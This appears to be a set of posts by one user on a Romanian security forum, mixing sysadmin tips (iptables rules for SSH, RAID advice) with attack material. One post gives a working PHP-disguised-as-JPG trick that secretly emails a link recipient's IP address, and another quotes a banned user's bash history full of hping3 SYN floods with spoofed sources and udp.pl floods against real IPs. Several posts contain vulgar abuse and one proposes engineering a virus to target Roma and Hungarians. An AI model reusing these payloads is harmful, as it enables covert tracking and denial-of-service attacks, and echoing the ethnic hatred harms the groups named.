aelius

@GarryOne: Nu cred ca intelege nimeni ce vrei defapt cu codul ala. Poti folosi $_SERVER["DOCUMENT_ROOT"] pentru a vedea directorul web sau getcwd(); pentru a vedea directorul curent, cum a spus AhEaD

Welcome ; Sa cresti mare !

Sau, mai pe intelesul tuturor, cea mai buna si simpla varianta de a proteja serviciul ssh este folosirea listelor de acces (acl). Exemplu iptables -A INPUT -p tcp -s 217.156.101.10 --dport 22 -j ACCEPT # ip-ul de la serviciu iptables -A INPUT -p tcp -s 82.223.12.64 --dport 22 -j ACCEPT # ip-ul lu soacra-mea iptables -A INPUT -p tcp -s 82.77.65.12 --dport 22 -j ACCEPT # ip-ul meu de acasa iptables -A INPUT -p tcp --dport 22 -j REJECT --reject-with tcp-reset # Restul, get lost.

S-a rezolvat chat-ul, acum 10 minute. O sa fie ceva intreruperi pentru ca se mai lucreaza. Oricum nu cred ca bantuie multa lume pe aici la ora asta

http://en.support.wordpress.com/space-upgrade/

Serverul MySQL (cu baza de date), ruleaza separat fata de cel web. Au aparut erori la baza de date, si la repair, s-au sters unele row-uri. Nu este un anumit principiu si nu cred ca sterge cineva vreun utilizator fara sa aiba un motiv bine intemeiat.

Jurnalistii 3,14zdei tumefiate. Toti labarii semi-retarzi care au winamp-with-acordeonCuManele+Haviji.exe sunt hackeri.\ Nu e ma niciun TinKode, sughita omul ala ca tot vorbiti de el

@securityfocus.eu: Ideea ta cu site-ul de stiri de sec. este buna, insa ar trebui specificata sursa. Daca nu specifici sursa articolelor, oamenii nu o sa mai intre pe site la tine si o sa pierzi respectul comunitatii. Ma uitam prin site la tine si am observat cateva subiecte, printre care si: "Google struggling to meet cookie law requirements" "Military contractor warns of new Adobe Reader exploit" Titlurile acestor subiecte au spatii foarte mari intre cuvinte, timp in care, cealalte au spatii normale. Asta ma duce la ideea ca formatarea in urma copy/paste nu s-a facut corect. Si scoate adresa de email care este pusa "clear text" la contact. E jenant sa vezi asa ceva pe un site de securitate. Reclama aia adsense, poti face o alta reclama mai mica, la sfarsitul articolelor. Daca este pusa chiar acolo in header, strica tot aspectul iar lumea o sa creada ca acel site este facut special pentru asta. La newsletter, ar fi bine sa fie specificat cum se stocheaza si utilizeaza datele oamenilor care se inscriu, cat si frecventa email-urilor. Sper ca nu te superi ..

Proftpd tinde sa devina ce a fost wuftpd odata. https://www.rtfm.ro/advisories/telnet-iac-handling-vulnerability-in-proftpd/

@demon_zone: Da, se lucreaza la el. Trebuie sa-i dam cu after shave

haha, da, pai sa-l rugam sa includa si adresa lui de email+numele in request-urile http ?

De cateva zile un copil ratat ce umbla ma-sa prin santuri rupta de beata, lingand-o cainii pe bot, si tacsu se uita la meciuri de fotbal, asculta manele, bea bere si sparge seminte, scarpinandu-se la pula cu gandul la mancarea de cacat ce i-a facut-o nevasta-sa, tot da flood in rstcenter.com. Am pus filtre pe udp total, sa nu se mai chinuie, am pus filtre pe sesiuni tcp, tot insista. Acum da cu un rahat de botnet din "winblows-uri", cu http get. Ce pula mea ma, ce castiga daca da flood la un forum. Chiar e nevoie sa pun 30 de servere pe 1gbit cu load balancing, ca sa-i arat ca nu pica atunci cand vrea pulicica lui mica si atrofiata ? M-a mai trezit si cu noaptea in cap, sa stau sa filtrez rahatul manual. Copii labagii facuti din laba trista si carati de muste-n 3,14zda, plantati pe cale orala si nascuti pe cea dorsala. Se pare ca nu-i deranjaza lucrul asta.

Daca ai un controller separat, raid hardware. Daca ai doar trompeta dupa placa de baza, raid software. Sa fie raid 10, daca ai nevoie de transfer de date sustinut. Plus ca ai protectia datelor. PS: Raid-ul ala intel este un fel de frectie la picior de lemn, ai dreptate.

// offtopic Eu propun modificarea genetica a virusului pentru a avea efect la tigani si unguri. De asemenea, ca subiect de test poate fi folosit Laslo Tokes.

Metoda 1. hp poze # cat .htaccess AddType application/x-httpd-php .php .jpg hp poze # cat bunaciune.jpg <?php header("Content-type: image/jpg"); echo fopen("http://img802.imageshack.us/img802/8550/2152250740f0662ce25ao.jpg", "r"); mail("gigi@adresamea.ro", "ip fraier", ip fraier: $_SERVER["REMOTE_ADDR"]); ?> hp poze # - Fisierul .jpg este procesat ca php. - Doar dati link-ul pe messenger, url/bunaciune.jpg si primiti pe email adresa ip. nu trebuie sa dea click Metoda 2. Stai cu tail -f pe log-ul de la apache, si dai cu link-ul cu orice poza, nu e nevoie sa dea click si va apare adresa ip in log.

@Fed0t: ignore_user_abord -> asta da ignore la userul ... de la bordul vaporului ? (e abort) shell_exec -> este pusa de doua ori. exec -> lipseste

@bcman: Private scrie la toate sculele, si totusi sunt pe web. @J: Merci, m-ai facut fericit, doar ca era sa vars cafeaua pe mine )

LOLL )) ) Nu e virus, e poza lu pax in pana mea acolo, pe aia o vede antivirusul )

lol, nu am stat sa ma uit. Acum arunc o privire sa-i vad mecla

Sunt timeouti mici pe web, 'wget -c' sau puteti lua de aici: https://www.rtfm.ro/pax.tgz ; Oricum nu am idee daca e ceva bun in homedir-ul ratatului

@Zatarra: Pax este. Eu rad si acum de ratat

A fost odata un ratat ce cotrobaia pe forum pe aici si il chema pax. Cu cateva luni in urma, mi-a zis ca nu are si el pe ce sa lucreze la diverse scripturi (php stuff), si avand un morman de servere acasa pe care lucrez, fac teste, benchmark-uri, i-am adaugat un account pe unul din servere. Aseara ma uitam sa fac ce face ratatul acolo: hp ~ # w 11:46PM up 8 days, 10:52, 3 users, load averages: 1.67, 1.70, 1.50 USER TTY FROM LOGIN@ IDLE WHAT root pts/0 workstation Sat09AM - w root pts/1 workstation 11:36PM 7 -bash (bash) pax pts/2 89.114.232.245 11:00PM 46 perl udp.pl 93.115.122.233 0 0 M-am uitat prin bash history sa vad ce sloboz face saracia acolo, si in afara de faptul ca "lucra" la cate ceva (stie php cum stia bunica-mea blowjob) am vazut astea: 3293 2011-11-26 21:46:13 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP93.115.122.233 3294 2011-11-26 21:46:15 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP 3295 2011-11-26 21:46:18 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP 3296 2011-11-26 21:46:52 hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source 93.115.122.233 3297 2011-11-26 21:47:02 hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --rand-source 93.115.122.233 3298 2011-11-26 21:47:12 sudo hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --rand-source 93.115.122.233 3304 2011-11-26 21:51:48 hping 93.115.122.233 --rand-source -S --destport 445 --faster --debug -w 2048 3305 2011-11-26 21:52:52 hping 93.115.122.233 --rand-source -S --destport 445 --faster --debug -w 2048 3235 2011-11-20 14:55:55 perl udp.pl 78.97.149.15 80 80 3236 2011-11-20 14:56:30 perl udp.pl 78.97.149.15 80 800 3237 2011-11-20 14:57:05 perl udp.pl 78.97.149.15 80 800 & 3238 2011-11-20 14:57:08 perl udp.pl 78.97.149.15 80 800 & 3239 2011-11-20 14:57:08 perl udp.pl 78.97.149.15 80 800 & 3240 2011-11-20 14:57:10 perl udp.pl 78.97.149.15 80 800 & 3241 2011-11-20 14:57:15 perl udp.pl 78.97.149.15 80 800 & 3242 2011-11-20 14:57:20 perl udp.pl 78.97.149.15 80 800 & 3222 2011-11-20 14:43:55 curl http://lasemafor.ro/udp.pl -O udp 3223 2011-11-20 14:44:05 ls 3224 2011-11-20 14:44:17 curl http://lasemafor.ro/udp.pl -O x 3225 2011-11-20 14:44:24 curl lasemafor.ro/udp.pl -O x 3226 2011-11-20 14:44:28 curl lasemafor.ro/udp.pl -o x 3320 2011-11-27 19:02:56 pl udp.pl 79.112.84.177 0 0 3321 2011-11-27 19:03:01 perl udp.pl 79.112.84.177 0 0 3322 2011-11-27 19:04:32 netstat 3323 2011-11-27 19:04:40 ping 79.112.84.117 3324 2011-11-27 19:06:31 echo plm 3325 2011-11-27 19:06:57 ping google.ro 3326 2011-11-27 19:07:25 ping 89.114.232.245 3327 2011-11-27 19:20:24 ping 79.112.84.117 3328 2011-11-27 23:00:33 perl udp.pl 93.115.122.233 0 0 Si astea: (nu stiu cat de ratat poate sa fie sa de yum/apt-get/aptitude pe un FreeBSD, plus ca era user.) 3257 2011-11-25 13:58:35 yum install htop 3258 2011-11-25 13:58:40 apt-get install htop 3259 2011-11-25 13:58:49 aptitude install htop Am sters account-ul la trotineta asta cu pedale, i-am arhivat directorul home si l-am pus aici, ca poate sunt necesare la cineva. www.rstcenter.com/pax.tgz Poftiti lupii mei, e moca!

Vorbeste la Epayment (e gecad), romanesc, etc. (este "reseller" la romcard)

Bun post, Se mai poate folosi si lsof sau sockstat in loc de netsat

Pe torente romanesti o sa gasesti rahaturi de manele. Doar in Romania se poate ca Ciprian Porumbescu sa aibe 3000 views pe youtube, iar Salam 6 milioane. Cauti dupa nume, nu cu "mari compozitori", exemplu: Download beethoven Torrents - KickassTorrents